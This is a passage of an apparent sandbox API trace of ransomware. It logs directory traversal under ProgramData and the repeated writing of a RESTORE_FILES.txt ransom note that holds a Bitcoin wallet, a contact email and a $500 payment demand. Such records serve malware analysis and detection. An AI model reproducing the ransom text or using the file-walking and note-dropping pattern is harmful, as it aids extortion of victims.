lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.810] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.810] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.810] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.810] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\..") returned 36 [0066.810] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.810] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.810] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.810] lstrcmpiW (lpString1="8.0", lpString2="Windows") returned -1 [0066.810] lstrcmpiW (lpString1="8.0", lpString2="Program Files") returned -1 [0066.811] lstrcmpiW (lpString1="8.0", lpString2="Program Files (x86)") returned -1 [0066.811] lstrcmpiW (lpString1="8.0", lpString2="$Recycle.bin") returned 1 [0066.811] lstrcmpiW (lpString1="8.0", lpString2="System Volume Information") returned -1 [0066.811] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0") returned 37 [0066.811] lstrcmpW (lpString1="8.0", lpString2=".") returned 1 [0066.811] lstrcmpW (lpString1="8.0", lpString2="..") returned 1 [0066.811] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\*") returned 39 [0066.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0066.811] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.811] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.811] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.811] lstrcmpiW (lpString1=".", 
lpString2="$Recycle.bin") returned 1 [0066.811] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.811] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\.") returned 39 [0066.811] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.811] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.811] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.811] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.811] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.811] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.811] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.811] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\..") returned 40 [0066.811] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.811] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.811] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.811] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.812] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\RESTORE_FILES.txt") returned 55 [0066.812] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\msdn\\8.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.813] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.813] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.813] lstrlenA (lpString="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") returned 684 [0066.813] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.813] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.813] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0066.814] CloseHandle (hObject=0xb4) returned 1 [0066.814] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.814] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.814] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\RESTORE_FILES.txt") returned 51 [0066.814] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\msdn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.814] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.814] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.815] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.815] WriteFile (in: hFile=0xa4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.815] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.815] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0066.815] CloseHandle (hObject=0xa4) returned 1 [0066.815] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.815] lstrcmpiW (lpString1="NetFramework", lpString2="Windows") returned -1 [0066.815] lstrcmpiW (lpString1="NetFramework", lpString2="Program Files") returned -1 [0066.815] lstrcmpiW (lpString1="NetFramework", lpString2="Program Files (x86)") returned -1 [0066.815] lstrcmpiW (lpString1="NetFramework", lpString2="$Recycle.bin") returned 1 [0066.815] lstrcmpiW (lpString1="NetFramework", lpString2="System Volume Information") returned -1 [0066.815] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework") returned 41 [0066.815] lstrcmpW (lpString1="NetFramework", lpString2=".") returned 1 [0066.815] lstrcmpW (lpString1="NetFramework", lpString2="..") returned 1 [0066.815] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*") returned 43 [0066.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.816] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.816] lstrcmpiW 
(lpString1=".", lpString2="Program Files") returned -1 [0066.816] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.816] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.816] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.816] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\.") returned 43 [0066.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.816] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.816] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.816] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.816] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.816] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.816] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.816] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\..") returned 44 [0066.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.817] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.817] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.817] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Windows") returned -1 [0066.817] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Program Files") returned -1 [0066.817] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Program Files (x86)") returned -1 [0066.817] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="$Recycle.bin") returned 1 [0066.817] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="System Volume Information") returned -1 [0066.817] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore") returned 57 [0066.817] lstrcmpW (lpString1="BreadcrumbStore", lpString2=".") returned 1 [0066.817] lstrcmpW (lpString1="BreadcrumbStore", lpString2="..") returned 1 [0066.817] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*") returned 59 [0066.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0066.817] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.817] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.817] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.817] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.817] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.817] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\.") returned 59 [0066.817] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.817] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.817] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.817] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.817] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.817] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.817] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.817] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\..") returned 60 [0066.817] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.817] 
lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.817] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.817] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.817] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\RESTORE_FILES.txt") returned 75 [0066.818] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\netframework\\breadcrumbstore\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.831] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.831] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.831] lstrlenA (lpString="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") returned 684 [0066.831] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.832] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.832] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0066.832] CloseHandle (hObject=0xb4) returned 1 [0066.832] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.832] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.832] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\RESTORE_FILES.txt") returned 59 [0066.832] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\netframework\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.832] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.832] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.833] lstrlenA (lpString="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") returned 684 [0066.833] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.833] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.833] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0066.833] CloseHandle (hObject=0xa4) returned 1 [0066.833] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.833] lstrcmpiW (lpString1="Network", lpString2="Windows") returned -1 [0066.833] lstrcmpiW (lpString1="Network", lpString2="Program Files") returned -1 [0066.833] lstrcmpiW (lpString1="Network", lpString2="Program Files (x86)") returned -1 [0066.833] lstrcmpiW (lpString1="Network", lpString2="$Recycle.bin") returned 1 [0066.833] lstrcmpiW (lpString1="Network", lpString2="System Volume Information") returned -1 [0066.833] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network") returned 36 [0066.834] lstrcmpW (lpString1="Network", lpString2=".") returned 1 [0066.834] lstrcmpW (lpString1="Network", lpString2="..") returned 1 [0066.834] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*") returned 38 [0066.834] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.834] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.834] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.834] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.834] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.834] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.834] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\.") returned 38 [0066.834] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.834] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.834] lstrcmpiW (lpString1="..", 
lpString2="Windows") returned -1 [0066.834] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.834] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.834] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.834] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.834] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\..") returned 39 [0066.834] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.834] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.834] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.834] lstrcmpiW (lpString1="Connections", lpString2="Windows") returned -1 [0066.834] lstrcmpiW (lpString1="Connections", lpString2="Program Files") returned -1 [0066.834] lstrcmpiW (lpString1="Connections", lpString2="Program Files (x86)") returned -1 [0066.834] lstrcmpiW (lpString1="Connections", lpString2="$Recycle.bin") returned 1 [0066.834] lstrcmpiW (lpString1="Connections", lpString2="System Volume Information") returned -1 [0066.834] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections") returned 48 [0066.834] lstrcmpW (lpString1="Connections", lpString2=".") returned 1 [0066.834] lstrcmpW (lpString1="Connections", lpString2="..") returned 1 [0066.834] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*") returned 50 [0066.834] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0066.835] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.835] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 
[0066.835] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.835] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.835] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.835] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\.") returned 50 [0066.835] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.835] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.835] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.835] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.835] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.835] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.835] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.835] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\..") returned 51 [0066.835] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.835] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.835] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.835] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.835] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\RESTORE_FILES.txt") returned 66 [0066.835] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\network\\connections\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
